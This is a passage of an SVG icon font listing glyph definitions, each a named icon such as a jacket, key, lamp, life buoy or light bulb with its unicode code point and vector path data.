<glyph glyph-name="interface" horiz-adv-x="1000" unicode="&#xef52;" d="M937 669c0 8-1 16-4 22-9 21-27 28-48 28h-766c-39 0-56-17-56-55v-326c0-101 0-203 0-305 0-14 3-27 14-38 11-11 25-13 40-13h532c79 0 158-1 237 0 32 0 51 19 51 50 1 212 1 425 0 637z m-633-8c16 0 23-7 24-23 0-15-8-23-23-23-16 0-23 7-23 23 0 16 7 23 22 23z m-80 0c16 0 22-7 22-23 0-16-6-23-22-23-16 0-23 7-23 23 0 15 8 23 23 23z m-81 0c15 0 23-7 24-23 0-15-8-23-23-23-16 0-23 7-24 22 0 16 8 24 23 24z m772-625c0-23-8-31-31-31h-769c-21 0-29 8-29 30v522h829v-521z" />
<glyph glyph-name="invisible" horiz-adv-x="1000" unicode="&#xef53;" d="M665 762c-12 27-46 34-67 15l-70-66c-16-15-40-15-56 0l-71 65c-21 20-55 12-66-15l-58-141h445l-57 142z m-511-312h690c22 0 29 30 10 40l-85 45h-539l-85-45c-20-10-12-40 9-40z m745-253c-88 36-181 55-255 66-18 3-36-8-43-25l-70-161c-13-29-52-29-64 0l-68 161c-8 17-26 28-44 25-74-10-167-30-255-65-18-8-30-27-25-48l36-203c4-21 21-34 41-34h695c21 0 38 14 41 34l37 203c4 20-7 40-26 47z" />
<glyph glyph-name="jacket" horiz-adv-x="1000" unicode="&#xef54;" d="M102-70c0-10 7-18 17-18h0v14h9v-14h83c9 0 17 3 17 7 0 3 0 5 0 7 1 13 1 25 1 38h-125c0-11-1-23-2-34z m794 34h-125c1-13 1-25 2-38 0-2 0-4 0-7 0-3 7-6 17-6h83v13h9v-14h0c10 0 17 8 16 18 0 11-1 23-2 34z m-5 73c-4 62-9 123-13 184-5 71-11 141-17 212-4 61-8 122-13 183-1 4-4 10-8 12-42 19-85 39-128 56-19 8-38 13-58 18-9 3-17 12-17 20v15c0 29 0 29-28 36-79 20-157 20-235-4-7-3-10-5-9-13 0-10 0-21 0-32 0-9-1-17-3-18-1 0-1 0-2 0-70-16-137-43-200-77-6-3-9-7-9-14-2-30-4-59-6-88l-21-287c-7-89-13-179-19-269h124c1 31 2 61 4 91 5 79 13 159 27 237 4 19 3 19 23 18 0 0 1 0 1 0 1-1 2-3 2-6v-6c0-45 0-91 0-136 0-7 0-110 0-142 0-7 2-10 8-13 38-19 77-33 118-43 8-1 16-3 23-4 7-1 14-2 20-3 4 0 8-1 11-1 3 0 6 0 8 1 3 2 6 4 8 7 1 3 1 5 1 8v45h35v-44c0-3 0-6 0-8 0-3 0-6 1-8 0-1 1-2 1-2 1 0 2 0 2 0 10 0 20 1 29 2 15 2 29 4 42 8 41 9 79 24 117 45 2 1 4 6 4 9 0 18 0 36 0 54 0 15 1 82 0 90 0 45 0 91 0 136v6c0 3 2 6 4 6 2 0 3 0 4 0 10 1 15-1 17-13 4-34 12-68 15-102 6-77 11-154 16-231h126c-2 21-3 43-5 65z m-390 697c-47 0-85 9-85 22s38 21 85 21c48 0 86-9 86-21s-38-22-86-22z" />
<glyph glyph-name="jar" horiz-adv-x="1000" unicode="&#xef55;" d="M700 627v63h-399v-64c-38-5-58-25-67-57-2-8-2-18-2-27-1-187-1-374 0-561 0-38 32-69 72-69h392c41 0 73 31 73 69v561c0 48-19 72-69 85z m-17 161h-366c-9 0-16-8-16-17v-60h398v60c0 9-7 17-16 17z" />
<glyph glyph-name="jewlery" horiz-adv-x="1000" unicode="&#xef56;" d="M596 599c0 0 1 0 1 0l66 118c2 4 0 9-4 11l-151 57c-3 1-5 2-7 2l0 1c-1 0-2 0-2 0 0 0-1-1-1-1-1 0-3-1-6-2l-151-57c-5-2-7-7-4-11l66-118 0-1c-146-42-253-176-253-335 0-194 157-350 350-350s350 156 350 350c-1 159-108 294-254 336z m-96-605c-148 0-268 120-268 268 0 148 120 269 268 269 148 0 268-121 268-269 0-148-120-268-268-268z" />
<glyph glyph-name="karate" horiz-adv-x="1000" unicode="&#xef57;" d="M681 204l28-86c1-4-1-8-5-9l-19-6c-4-1-8 1-9 4l-31 97c-1 4-2 7-1 7 0 0 0 0-1 0-1 0-3-3-4-7l-29-91c-1-4-5-6-8-4l-20 6c-4 1-6 5-4 9l25 81c1 3-1 6-5 6h-307c-3 0-7-3-8-7l-76-284c-1-4 1-7 5-7l576 0c3 0 6 3 5 6l-76 285c-1 4-5 7-9 7h-22c-4 0-6-3-5-7z m-49 583h-264c-4 0-9-1-12-4l-206-160c-3-2-6-7-6-11l-54-354c0-4 2-7 6-7h131c4 0 7 3 7 7v258c0 4 0 8 1 9s2-2 3-6l45-251c1-4 4-7 8-7h418c4 0 7 3 8 7l45 250c1 4 2 7 3 6 0 0 1-4 1-8v-259c0-3 3-7 7-7h130c4 0 7 3 6 7l-53 355c-1 4-4 9-7 11l-204 160c-3 3-9 4-13 4z m-136-236l-119 175c-2 3-1 5 3 5h239c4 0 5-2 3-5l-118-175c-3-3-6-3-8 0z" />
<glyph glyph-name="key-hole" horiz-adv-x="1000" unicode="&#xef58;" d="M63 621v-542c0-92 74-167 166-167h542c92 0 167 75 167 167v542c0 92-75 167-167 167h-542c-92 0-166-75-166-167z m315-511l73 262c-45 18-77 62-77 114 0 67 55 122 122 122s123-55 123-122c0-46-26-86-63-107l70-269h-248z" />
<glyph glyph-name="key" horiz-adv-x="1000" unicode="&#xef59;" d="M67 108c17-1 31-2 46-3 14 0 29-1 43-2 1 31 1 60 2 90 32-2 61-3 91-5 1 32 1 61 2 91 32-2 61-3 92-4 0 16 0 32 1 47 0 20 1 40 2 60 1 6 4 13 8 17 19 20 40 39 61 58 6 5 7 10 6 19-18 103 14 189 96 255 84 67 211 70 301 9 126-84 158-250 69-372-63-88-168-124-274-98-9 3-14 2-21-5-121-114-242-227-363-341-7-6-13-8-22-8-37 2-74 3-111 4-27 2-34 9-33 37 1 49 3 99 4 151z m643 445c26-28 70-30 98-5 28 27 29 70 2 98-27 28-71 30-98 4-27-25-28-70-2-97z" />
<glyph glyph-name="label" horiz-adv-x="1000" unicode="&#xef5a;" d="M918 343c-182 135-364 271-546 406-15 11-29 12-46 5-67-30-135-61-204-90-19-9-29-22-31-43-9-74-18-148-28-221-2-18 3-32 18-43 91-67 182-135 274-202 91-68 182-136 274-204 8-6 19-9 28-9 15-1 24 10 32 21 79 106 157 212 236 318 1 2 3 3 4 5 14 23 11 41-11 57z m-638 169c-20-27-57-31-83-11-27 20-32 58-12 84 20 27 58 31 85 11 26-20 31-58 10-84z" />
<glyph glyph-name="lamp" horiz-adv-x="1000" unicode="&#xef5b;" d="M558 118c0 50 0 141 0 141v39c0 18 15 32 33 32h162c18 0 29 15 25 32-35 139-70 277-104 415-2 11-8 10-16 10-106 0-211 0-316 1-11 0-14-4-17-14-31-126-63-253-95-379-3-11-5-23-8-34-4-18 7-32 25-32h162c18 0 32-15 32-33v-178c0-18 1-46 1-62 0-17-15-30-33-30h-47c-18 0-33-15-33-33v-48c0-18 15-33 33-33h276c18 0 33 15 33 33v49c0 18-15 33-33 33h-47c-18 0-33 13-33 29 0 16 0 44 0 62z" />
<glyph glyph-name="layers" horiz-adv-x="1000" unicode="&#xef5c;" d="M500 380l438 157-436 159h-3l-437-159 436-157h2z m0-113l-191 69-138-49 329-119 329 119-138 49-191-69z m0-163l-191 69-138-50 329-119 329 119-138 50-191-69z" />
<glyph glyph-name="layout" horiz-adv-x="1000" unicode="&#xef5d;" d="M63 702h260v-200h-260v200z m307 0h260v-200h-260v200z m307 0h261v-200h-261v200z m-614-252h875v-200h-875v200z m0-251h398v-201h-398v201z m476 0h399v-201h-399v201z" />
<glyph glyph-name="leaf" horiz-adv-x="1000" unicode="&#xef5e;" d="M934 653s-101-32-188-21c-645 76-608-424-601-429 0 0 57 38 114 48 359 61 524 256 524 256s-193-237-510-286c-70-11-150-84-210-167 0 0 44-3 61-7 26 37 58 68 97 92 307-203 545 6 605 91 142 200 108 423 108 423z" />
<glyph glyph-name="leaflet" horiz-adv-x="1000" unicode="&#xef5f;" d="M367 20l270-35v715l-270 27v-707z m294-36l277 25v719l-277-29v-715z m-318 742l-280-28v-725l280 45v708z" />
<glyph glyph-name="learn" horiz-adv-x="1000" unicode="&#xef60;" d="M882 263v203l-74-10c-4 30-18 45-35 53-1 15-2 29-3 43-10 181-103 237-250 234-19 0-38-3-58 0-77 12-151-48-196-102-54-65-34-168-34-173-19-7-35-22-39-54l-65 9v-197c-26-13-44-41-44-73 0-32 18-60 44-72v-162l377-50 377 50v167c20 14 34 39 34 67 0 28-14 53-34 67z m-394-320l-325 43v131c39 2 70 36 70 79 0 43-31 77-70 79v158l29-4 296-39v-447z m-203 502c-1 10-2 19-2 28 3 20 10 38 17 53 16 32 43 57 78 69 9 3 17 0 23-7 5-7 4-17-2-23l-2-2c-5-5-6-11-3-17 4-6 10-9 17-8 48 8 122 27 186 69 15 10 33 14 50 10 17-3 33-13 42-28 1-1 2-3 3-4 20-31 30-67 30-103 0-12 0-25-2-37l-215-29-220 29z m563-170l-6 1c-41 0-74-36-74-80 0-44 33-80 74-80 2 0 4 1 6 1v-131l-326-43v447l326 43v-158z" />
<glyph glyph-name="lego" horiz-adv-x="1000" unicode="&#xef61;" d="M769 286h-51c-3 0-6 2-6 5-1 10-1 19-2 27 0 3-3 6-6 6h-128c-3 0-6-3-6-6 0-9-1-18-1-28-1-3-3-5-6-5h-116c-3 0-5 2-5 5-1 10-1 19-1 28-1 3-3 5-6 5h-130c-3 0-5-2-5-5-1-10-1-19-2-30 0-3-3-5-6-5h-60c-3 0-5-3-5-6v-359c0-3 2-5 5-5h537c3 0 5 2 5 5v362c0 3-2 6-5 6z m-9 63l26 361c1 3-2 6-5 6l-50 4c-3 0-6 3-6 6v27c0 3-2 6-5 6l-128 9c-3 0-6-2-6-5-1-9-3-18-4-28 0-3-3-5-6-5l-115 9c-3 0-5 3-5 6 0 9 0 18 1 28 0 3-3 5-6 5l-129 10c-3 0-6-2-6-5-1-10-2-20-4-30 0-3-3-5-6-5l-60 4c-3 0-5-2-6-5l-26-358c0-3 2-6 5-6l535-39c3 0 6 2 6 5z" />
<glyph glyph-name="lens" horiz-adv-x="1000" unicode="&#xef62;" d="M129 298c3-36 20-122 101-211 7-7 13-5 15 4l70 329c2 9-3 13-11 8l-162-104c-7-5-14-17-13-26z m144-248c27-23 100-72 221-77 9 0 12 6 7 14l-184 281c-5 8-11 7-13-2l-40-188c-2-9 2-22 9-28z m274-70c36 4 122 20 211 102 7 6 5 13-4 15l-329 70c-9 2-13-3-8-11l104-162c5-8 17-14 26-14z m32 176l188-40c9-2 22 1 28 9 23 27 72 100 77 220 0 10-6 13-14 8l-281-184c-8-5-7-11 2-13z m292 247c-3 35-20 121-101 210-6 7-13 5-15-4l-70-329c-2-9 3-12 11-7l162 103c8 6 14 17 13 27z m-144 248c-27 22-100 71-221 76-9 1-12-6-7-14l184-281c5-8 11-7 13 3l40 188c2 9-2 22-9 28z m-274 69c-36-3-122-20-211-102-7-6-5-13 5-15l328-70c9-2 13 3 8 11l-104 162c-5 8-17 15-26 14z m-248-144c-23-28-72-100-77-221 0-9 6-13 14-8l281 184c8 6 7 11-2 13l-188 41c-9 2-22-2-28-9z m295 209c-241 0-437-194-437-435s196-435 437-435c242 0 438 195 438 435s-196 435-438 435z m0-835c-222 0-402 179-402 400 0 222 180 401 402 401 223 0 403-179 403-401 0-221-180-400-403-400z" />
<glyph glyph-name="letter" horiz-adv-x="1000" unicode="&#xef63;" d="M822 416c-10 5-13 12-13 22l0 66c0 66 0 191 0 250 0 19-14 33-33 33h-545c-19 0-33-14-33-33 0-59 0-183 0-250 0-22 0-43 0-65 0-9-3-13-11-18-28-16-56-32-84-48-21-13-33-32-33-59 1-120 1-240 1-361 0-5 0-10 0-15 2-17 9-24 26-25 4-1 8-1 13-1h780c4 0 7 0 10 0 20 1 28 9 30 29 0 4 0 9 0 13 0 119 0 238 0 357 0 30-12 50-37 64-23 14-47 28-71 41z m-510 258h287v-46h-287v46z m0-115h333v-47h-333v47z m0-116h261v-46h-261v46z m333-116v-46h-333v46h333z m242-354c0-15-3-18-21-18h-692c-13 0-27 0-40 0-18 0-20 3-20 20 0 51 0 101 0 152 0 62 0 123 0 185-1 11 3 19 12 24 23 14 46 28 71 43v-114c-16 9-31 18-49 28 0-14 0-26 0-38 1-3 4-6 6-8 108-59 215-118 323-178 18-10 33-7 50 2 88 49 176 96 264 145 19 10 37 20 55 31 3 2 6 7 7 11 1 11 0 21 0 34-15-8-28-15-43-23v106c25-15 48-29 70-44 4-2 7-10 7-15 0-114 0-229 0-343z" />
<glyph glyph-name="letterbox" horiz-adv-x="1000" unicode="&#xef64;" d="M878 71l59 177c2 6-1 13-7 15-74 25-148 49-222 74v173h-41v-41h-158v219h-190c-13 0-23-10-23-23v-106c0-13 10-23 23-23h163v-67h-362c-32 0-57-26-57-57v-400h831v49h-173v32c0 8-3 15-8 21 50-17 100-34 150-50 6-2 13 1 15 7z m25 187c6-2 7-5 1-8-49-19-97-39-145-58-6-2-13 0-16 6-12 19-23 37-35 56v69c65-21 130-43 195-65z m-221-182c-8 0-15 7-15 16 0 8 7 15 15 15 9 0 16-7 16-15 0-9-7-16-16-16z m161 8c-45 15-90 30-135 45v86c5 1 8 2 8 1 1 0 1-1 1-1 8-13 16-27 24-40 2-3 3-3 6-2 14 6 28 12 43 18 0 0 1 0 2 0 1 1 4-4 7-9 16-31 33-61 49-92 3-5 1-8-5-6z m-32 103c-3 5-1 12 5 14 32 13 63 26 95 38 6 3 9 0 7-6-16-47-31-94-47-141-2-6-6-6-9-1-17 32-34 64-51 96z" />
<glyph glyph-name="library" horiz-adv-x="1000" unicode="&#xef65;" d="M198 514h-113c-12 0-22-10-22-22v-526c0-13 10-23 22-23h113c13 0 23 10 23 23v526c0 12-10 22-23 22z m-3-528h-107v26h107v-26z m17 567h-141c-5 0-8 4-8 8v29c0 5 3 9 8 9h141c4 0 8-4 8-9v-29c0-4-4-8-8-8z m-11 84h-120c-10 0-18 9-18 19v74c0 10 8 19 18 19h120c11 0 19-9 19-19v-74c0-10-8-19-19-19z m447-123h-114c-12 0-22-10-22-22v-526c0-13 10-23 22-23h114c12 0 22 10 22 23v526c0 12-10 22-22 22z m-57-530c-19 0-35 16-35 36s16 35 35 35c20 0 35-16 35-35s-15-36-35-36z m70 569h-141c-4 0-8 4-8 8v29c0 5 4 9 8 9h142c4 0 8-4 8-9v-29c0-4-4-8-9-8z m-10 84h-120c-11 0-19 9-19 19v74c0 10 8 19 19 19h120c10 0 19-9 19-19v-74c0-10-9-19-19-19z m203-113l-113-13c-12-2-21-13-20-25l59-523c2-12 13-21 25-20l113 13c12 2 21 13 19 25l-59 523c-1 12-12 21-24 20z m9 40l-141-16c-4-1-8 2-9 7l-3 29c-1 4 3 9 7 9l140 16c5 0 9-3 10-7l3-29c0-5-3-9-7-9z m-20 82l-120-13c-10-2-19 6-20 16l-9 74c-1 10 7 19 17 20l119 14c11 1 20-6 21-17l8-73c1-10-6-20-16-21z m-408-263h-138c-15 0-27-10-27-22v-396c0-12 12-22 27-22h138c15 0 28 10 28 22v396c0 12-13 22-28 22z m-157 42h176c4 0 8 3 8 8v29c0 5-4 8-8 8h-176c-4 0-8-3-8-8v-29c0-5 4-8 8-8z m11 84h154c10 0 19 8 19 19v73c0 11-9 19-19 19h-154c-10 0-19-8-19-19v-73c0-11 9-19 19-19z" />
<glyph glyph-name="license" horiz-adv-x="1000" unicode="&#xef66;" d="M736 514v5c0 5-4 9-9 9h-489c-5 0-9-4-9-9v-44c0-5 4-9 9-9h417c24 21 51 37 81 48z m-132-108h-366c-5 0-9-4-9-9v-44c0-5 4-8 9-8h339c6 21 15 42 27 61z m-366-127c-5 0-9-4-9-9v-42c0-5 4-9 9-9h333c-3 17-5 34-5 51 0 3 0 6 0 9l-328 0z m389-176h-504c-13 0-23 10-23 22v498c0 12 10 22 23 22h585c12 0 29-7 39-15 19-16 38-32 57-49 15-13 31-27 46-40 4-3 7-8 10-13 14-2 29-5 42-9v139c0 12-10 22-22 22h-795c-13 0-22-10-22-22v-569c0-12 9-22 22-22h579c-14 11-26 23-37 36z m303 229c-7 14-11 29-7 45 3 17-3 30-19 38-17 7-29 18-37 35-8 15-21 21-37 18-18-4-34-2-50 6-15 8-29 5-41-7-11-13-25-21-42-24-19-2-28-13-30-32-2-16-8-30-20-42-14-13-16-28-6-45 9-14 11-29 8-45-3-16 2-30 18-37 18-8 31-21 40-38 3-7 8-11 13-14v-160c0-12 5-13 12-3l43 71c6 10 16 10 23 0l43-71c6-10 11-9 11 3v174c0 0 0 1 0 1 7 4 15 7 23 8 21 5 27 12 30 32 2 16 8 30 19 42 16 16 17 24 6 45z m-145-103c-54 0-98 44-98 99 0 56 44 99 100 99 54 0 98-44 99-98 0-55-46-101-101-100z m78 99c0-43-34-77-77-77s-77 34-77 77 35 77 77 77 77-35 77-77z" />
<glyph glyph-name="life-bouy" horiz-adv-x="1000" unicode="&#xef67;" d="M156 621c-8 8-16 14-23 22-15 15-15 31-1 46 13 12 25 25 37 37 15 13 30 13 45 0 6-6 12-12 18-18 5-6 8-6 14-2 54 39 113 64 178 75 118 19 226-4 324-72 10-7 16-7 23 2 5 6 10 11 16 16 12 11 27 12 39 1 15-14 29-28 43-42 12-13 11-29-2-42-7-8-15-15-23-22 122-178 124-355 6-537 6-4 13-9 19-16 10-11 11-26 1-37-15-16-30-31-45-45-12-11-28-9-39 2-6 5-10 12-15 17-165-131-395-119-543 0-6-7-12-14-19-21-15-14-31-14-45 0-13 12-26 25-38 38-13 13-13 30 0 43 7 8 15 14 23 21-58 82-88 170-86 268 1 99 32 187 93 266z m462-463c-5 13-5 25 5 36 13 13 26 26 39 39 8 8 17 11 27 9 6-2 9 0 12 6 34 72 32 143-5 214-4 7-8 11-17 12-6 0-12 5-17 9-13 12-25 24-37 37-4 5-6 11-10 17-3 4-5 10-9 12-70 36-140 36-211 2-6-4-10-8-12-16-1-6-5-12-10-17-11-12-22-24-34-34-7-5-16-7-24-11-3-2-7-3-9-6-41-74-43-148-5-223 1-3 6-5 9-7 7-3 15-5 21-9 13-12 26-25 38-39 5-6 9-14 9-22 1-7 4-10 9-13 30-17 62-27 97-29 48-4 92 7 134 33z m110-113l-81 80c-98-58-197-58-295 1l-81-81c126-101 324-105 457 0z m-5 453c2-4 4-7 6-11 24-39 36-82 38-128 1-50-10-97-35-140-3-6-3-10 2-15 24-23 47-46 70-69 2-2 4-4 6-5 102 140 89 331-6 449-27-27-54-54-81-81z m-528 81c-105-135-98-326-6-450 25 25 50 51 75 75 6 6 6 9 2 16-33 60-42 123-27 189 7 32 20 62 37 89-27 27-54 54-81 81z m525 83c-146 104-332 83-441-2 25-24 49-48 73-73 7-7 11-7 19-3 64 35 132 44 202 23 23-7 44-17 66-26 26 26 53 53 81 81z" />
<glyph glyph-name="life-buoy" horiz-adv-x="1000" unicode="&#xef68;" d="M500 788c-242 0-437-196-437-438 0-242 195-438 437-438 242 0 438 196 438 438 0 242-196 438-438 438z m-1-79c0 19 15 34 34 32 81-6 157-38 219-90 14-12 14-33 1-46l-62-63c-13-13-35-13-50-2-40 30-89 46-140 47h-1s-1 15-1 33v45l0 44z m-390-326c7 81 38 157 90 219 12 14 33 14 47 1l62-62c14-13 13-35 2-50-24-31-39-68-44-107-3-19-18-34-36-34l-89-1c-18 0-34 15-32 34z m393-426h-2c-93 0-182 33-252 92-15 12-15 33-1 47l62 62c13 14 35 13 49 2 41-30 89-46 140-47h1s1-15 1-34v-44l5-44c1-18 2-34 1-34s-3 0-4 0z m-2 201c-106 0-192 86-192 192 0 106 86 192 192 192 106 0 192-86 192-192 0-106-86-192-192-192z m254-62l-63 63c-13 13-13 34-1 49 24 32 39 69 44 109 3 18 18 33 36 33l89 1c19 0 34-15 32-33-6-82-38-158-90-221-12-14-34-14-47-1z" />
<glyph glyph-name="life-jacket" horiz-adv-x="1000" unicode="&#xef69;" d="M327 821c-10 17-29 28-50 28l-96 0c-34 0-61-28-61-62 0-12 3-23 9-32l1-1c28-41 45-91 45-144 0-91-48-170-119-214l-1 0c-14-9-23-24-23-42v-29h433v226s1 25-16 55l-122 215z m70-465c-10 0-17 8-17 18 0 10 8 17 17 17 10 0 18-8 18-17 0-10-8-18-18-18z m138-31h434v29c0 18-9 33-23 42l-1 0c-72 44-120 124-120 214 0 53 17 103 45 144l1 1c6 9 9 20 9 32 0 34-27 62-61 62l-96 0c-21 0-40-11-50-28l-122-215c-16-30-16-55-16-55v-226z m68 67c10 0 18-8 18-18 0-10-8-18-18-18-10 0-18 8-18 18 0 10 8 18 18 18z m-68-112h434v-64h-434z m-504 0h434v-64h-434z m504-107h434v-63h-434z m-504 0h434v-63h-434z m938-261v152h-434v-152s-8-61 68-61h298c75 0 68 61 68 61z m-366 86c-10 0-18 8-18 18s8 17 18 17 18-8 18-17c0-10-8-18-18-18z m-138 66h-434v-152s-8-61 68-61h298c76 0 68 61 68 61v152z m-68-66c-10 0-17 8-17 18s8 17 17 17c10 0 18-8 18-17 0-10-8-18-18-18z" />
<glyph glyph-name="life-ring" horiz-adv-x="1000" unicode="&#xef6a;" d="M351 709c-3-8-11-17-18-21-4-2-9-4-13-6-31-17-60-39-87-65-26-26-48-56-65-87-2-4-4-8-6-13-4-7-13-14-21-18-46-22-79-80-79-149s33-127 79-149c8-3 18-11 21-18 2-4 4-9 6-13 17-31 39-60 65-87s56-47 87-64c4-3 9-5 13-7 7-3 15-13 18-21 22-46 80-79 149-79 69 0 127 33 149 79 3 8 11 18 18 21 5 2 9 4 13 7 31 16 61 38 87 64 26 27 48 56 65 87 2 4 4 9 6 13 4 7 13 15 21 18 46 22 79 80 79 149s-33 127-79 149c-8 4-17 11-21 18-2 5-4 9-6 13-17 31-39 61-65 87-26 26-56 48-87 65-4 2-8 4-13 6-7 4-15 13-18 21-22 46-80 79-149 79-69 0-127-33-149-79z m177-226c7-1 7-7-2-11-7-3-16-5-26-5-10 0-19 2-26 5-8 4-9 10-2 11 4 1 8 2 12 2 11 2 21 2 32 0 4 0 8-1 12-2z m20-21c7 5 19 7 26 3 8-6 15-12 22-19 7-6 13-14 18-22 5-7 3-19-2-26-9-13-15-29-15-48s6-35 15-48c5-7 7-18 2-26-5-8-11-15-18-22-7-7-14-13-22-18-7-5-19-3-26 2-13 9-30 14-48 14-19 0-35-5-48-14-7-5-19-7-26-2-8 5-15 11-22 18-7 7-13 14-18 22-5 7-3 19 2 26 9 13 14 30 14 48s-5 35-14 48c-5 7-7 19-3 26 6 8 12 15 19 22 6 7 14 13 22 18 7 5 19 3 26-2 13-9 29-15 48-15 19 1 35 6 48 15z m85-84c1-4 2-8 2-12 2-11 2-21 0-32 0-4-1-8-2-12-1-7-8-6-11 2-3 8-5 17-5 26 0 10 2 19 5 27 3 8 10 8 11 1z m-161-161c-7 1-6 8 2 11 7 3 16 5 26 5 10 0 19-2 26-5 8-3 9-10 2-11-4-1-8-2-12-2-11-1-22-1-32 0-4 0-8 1-12 2z m-105 105c-1 4-2 8-2 12-1 10-1 21 0 32 0 4 1 8 2 12 1 7 8 6 11-2 3-8 5-16 5-26 0-10-2-19-5-26-3-8-10-9-11-2z m-42 34c0-4 0-8 0-12 0-9-4-21-10-27l-106-107c-6-6-15-5-18 3-38 87-38 187 0 274 3 8 12 9 18 3l106-106c6-7 10-19 10-28z m466-146l-106 107c-6 6-10 18-10 27 0 4 0 8 0 12 0 9 4 21 10 27l106 107c7 6 15 5 18-3 39-87 39-187 0-274-3-8-11-9-18-3z m-658 261c6 5 10 2 8-7-24-74-24-154 0-228 2-9-2-12-9-7-30 24-50 69-50 121s20 97 51 121z m246-489c-5 7-2 11 7 9 74-24 154-24 228 0 9 2 12-2 7-9-24-30-69-50-121-50s-97 20-121 50z m258 59c-87-39-187-39-274 0-8 3-9 11-3 18l107 106c6 6 18 10 27 10 4 0 8 0 12 0 9 0 21-4 27-10l107-106c6-7 5-15-3-18z m231 188c-7-5-11-2-9 7 24 74 24 154 0 228-2 9 2 12 9 7 30-24 50-69 50-121s-20-97-50-121z m-362 296c-4 0-8 0-12 0-9 0-21 4-27 10l-107 106c-6 7-5 15 3 18 87 39 187 39 274 0 8-3 9-11 3-18l-107-106c-6-6-18-10-27-10z m108 184c-74 24-154 24-228 0-9-2-12 2-7 9 24 30 69 50 121 50 52 0 97-20 121-50 5-7 2-11-7-9z" />
<glyph glyph-name="light-bulb" horiz-adv-x="1000" unicode="&#xef6b;" d="M577 74h-155c-12 0-22-10-22-22 0-12 10-22 22-22h155c12 0 22 10 22 22s-9 22-22 22z m-117-127c3-19 19-35 40-35s37 15 40 35c27 2 48 24 48 51h-176c0-28 21-49 48-51z m40 715c16 0 29 13 29 29v67c0 16-13 30-29 30-16 0-29-13-29-30v-67c0-16 13-29 29-29z m-191-42c6-8 15-12 24-12 6 0 12 1 17 5 13 10 16 28 7 41l-40 54c-10 13-28 16-41 7s-16-28-6-41l39-54z m-152-132l64-21c3-1 6-1 9-1 12 0 23 7 27 20 5 15-3 31-18 36l-64 21c-16 5-32-3-37-18-5-16 3-32 19-37z m686-162l-64 21c-15 5-32-4-37-19-5-15 4-32 19-37l64-20c3-1 6-2 9-2 12 0 24 8 28 20 5 16-3 32-19 37z m-622 21l-64-21c-16-5-24-21-19-37 4-12 15-20 28-20 3 0 6 1 9 2l64 20c15 5 23 22 18 37-5 15-21 24-36 19z m549 119c3 0 6 0 9 1l64 21c15 5 24 21 19 36-5 16-22 24-37 19l-64-21c-15-5-24-21-19-36 5-13 16-20 28-20z m-46 249c-13 9-31 6-41-7l-40-54c-9-13-6-31 7-41 5-4 11-5 17-5 9 0 18 4 23 12l40 54c10 13 7 31-6 41z m-129-608v68c20 33 46 72 70 101 28 36 45 81 45 130 0 116-94 209-210 209-116 0-210-93-210-209 0-49 17-94 45-130 25-31 48-65 68-99v-70h192z" />
<glyph glyph-name="lighter" horiz-adv-x="1000" unicode="&#xef6c;" d="M616 609c14 7 29 7 43-1 51 32 36 149-22 180-43-43-65-89-48-141 4-14 10-28 27-38z m21 104c27-16 41-64 25-91-9 12-19 23-29 35-6-11-13-22-20-34-16 26-8 60 24 90z m-267-290c-39 0-61-20-61-57v-396c0-36 22-57 60-57 87-1 175-1 262 0 38 0 59 20 59 56v1h-121c-15 0-24 8-24 24v22h145v407h-16l-304 0z m-32 28h65c6 0 11 6 11 13v1c0 7-5 13-11 13h-65c-6 0-11-6-11-13v-1c0-7 5-13 11-13z m331 143c-64 0-129 0-193 0-24-1-47-18-48-40-2-34-1-68-1-103h263c0 42 0 83 0 123 0 15-7 20-21 20z" />
<glyph glyph-name="lightning-ray" horiz-adv-x="1000" unicode="&#xef6d;" d="M723 531h-14c-6 19-13 39-26 61-43 70-119 109-212 109-96 0-172-39-213-109-13-23-20-46-25-64-101-16-170-86-170-179 0-85 63-155 158-176 27-6 55 9 62 34 6 24-11 49-39 55-48 10-78 44-78 87 0 55 45 91 111 91 29 0 51 20 52 45 0 12 8 126 140 126 57 0 97-19 121-58 21-33 23-68 23-68 2-24 25-43 52-43h58c67 0 112-37 112-91 0-45-35-91-112-91-28 0-52-21-52-46s24-45 52-45c122 0 215 78 215 182 0 103-91 180-215 180z m-111-179c-3 5-9 9-15 9h-125c-6 0-13-5-16-12l-69-179c-2-6-1-12 2-16s8-7 14-7h36l-47-125c-4-8 0-16 6-21 3-1 6-2 10-2 4 0 9 2 12 6l189 214c4 4 6 12 2 18-3 6-7 9-12 9h-50l62 88c4 5 5 12 1 18z" />
<glyph glyph-name="like" horiz-adv-x="1000" unicode="&#xef6e;" d="M929 390c-7 45-42 74-88 75-61 1-122 0-182 0h-87c3 9 5 16 7 24 12 46 26 92 20 141-5 35-13 69-33 100-26 39-63 60-111 57-34-2-58-20-64-53-4-25-5-51-4-77 1-35-4-67-23-96-30-49-61-96-93-143-8-12-12-24-12-38 0-138 0-276 0-413 0-14 5-24 14-33 17-16 38-20 60-20 121 0 241 0 361 0 20 0 40 3 60 8 30 7 57 22 75 50 16 25 14 52 2 79 23 12 40 28 46 54 6 25 2 48-13 70 51 31 57 84 27 124 34 22 44 54 38 91z m-745 15h-22v0h-33v0h-21c-23 0-38-16-38-40-1-69 0-137 0-206v-201c0-31 14-45 45-45h14v-1l17 1s11-1 16-1v1h14c32 0 46 14 46 45v201c0 69 0 137 0 206 0 24-16 40-38 40z m-38-106c-15 0-26 12-26 26 0 14 11 26 26 26 14 0 26-12 26-26s-12-26-26-26z" />
<glyph glyph-name="line-height" horiz-adv-x="1000" unicode="&#xef6f;" d="M352 413v-12c12 1 27 2 45 2 23 0 47-1 73-2v12c-17 1-30 4-39 10s-13 15-13 30c0 16 6 38 16 66l16 41h129l35-97c5-13 7-22 7-28 0-8-3-13-9-16-7-3-17-5-32-6v-12c19 2 49 2 89 2 37 0 66-1 90-2v12c-6 0-13 4-19 9-7 6-13 16-18 29l-143 369c-6 0-13 0-21 0-7 0-14 0-20 0l-135-345c-14-38-31-59-51-62z m164 318l58-160h-119l61 160z m125-462v-12c16 0 28-4 37-11s12-19 12-35c0-17-5-41-16-72l-73-196-104 265c-5 12-7 21-7 28 0 8 3 13 10 16 6 3 17 5 32 5v12c-20-1-50-1-90-1-36 0-66 0-90 1v-12c6 0 13-3 20-9 6-6 12-15 17-28l151-370c4 0 11 1 20 1 9 0 16-1 21-1l124 337c7 21 16 37 25 48 10 11 20 19 30 22v12c-12-1-27-1-45-1-23 0-48 0-74 1z m-381 212v238h39l-49 66-48-66h39v-238h-39l48-66 49 66h-39z m-83 369h55v-13h-55v13z m74 0h55v-13h-55v13z m74 0h55v-13h-55v13z m73 0h56v-13h-56v13z m74 0h56v-13h-56v13z m74 0h56v-13h-56v13z m74 